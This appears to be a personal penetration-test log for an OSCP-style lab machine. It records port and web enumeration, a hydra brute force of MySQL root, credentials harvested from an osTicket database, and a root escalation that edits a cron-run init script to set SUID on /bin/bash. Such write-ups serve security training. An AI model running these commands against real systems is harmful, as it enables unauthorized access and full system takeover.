🧪 Pentest Log: {{date:2025-08-25}}

🔍 Target Information

• Machine Name: Helpdesk V2
• IP Address: 10.11.1.11
• Operating System: Linux

ip=10.11.1.11

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Found plugins

tatsu

Google for "tatsu 4.3 exploit", found

https://github.com/darkpills/CVE-2021-25094-tatsu-preauth-rce

Port 3306

hydra -l root -P '/home/kali/Documents/oscp/rockyou.txt' mysql://$ip

Found password

root:whatever

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 3306
• Vulnerability Type: Weak Password

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

mysql -u root -p -h $ip --skip-ssl-verify-server-cert

Within the osticket database, under the ost_thread_entry table, found credential

helpdesk:helpdesk90621

🧬 Privilege Escalation

👤 Current Access

• User: helpdesk
• Groups: 1000(helpdesk)
• Shell Type: ssh

🔍 Enumeration

Scheduled Task:

cat /etc/crontab

found

* * * * * root service help start

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Schedule Task Abuse
• Target Binary/Service: help
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

vi /etc/init.d/help

start() {
        echo "Starting help"
        chmod +s /bin/bash
}

• Smash to root

bash -p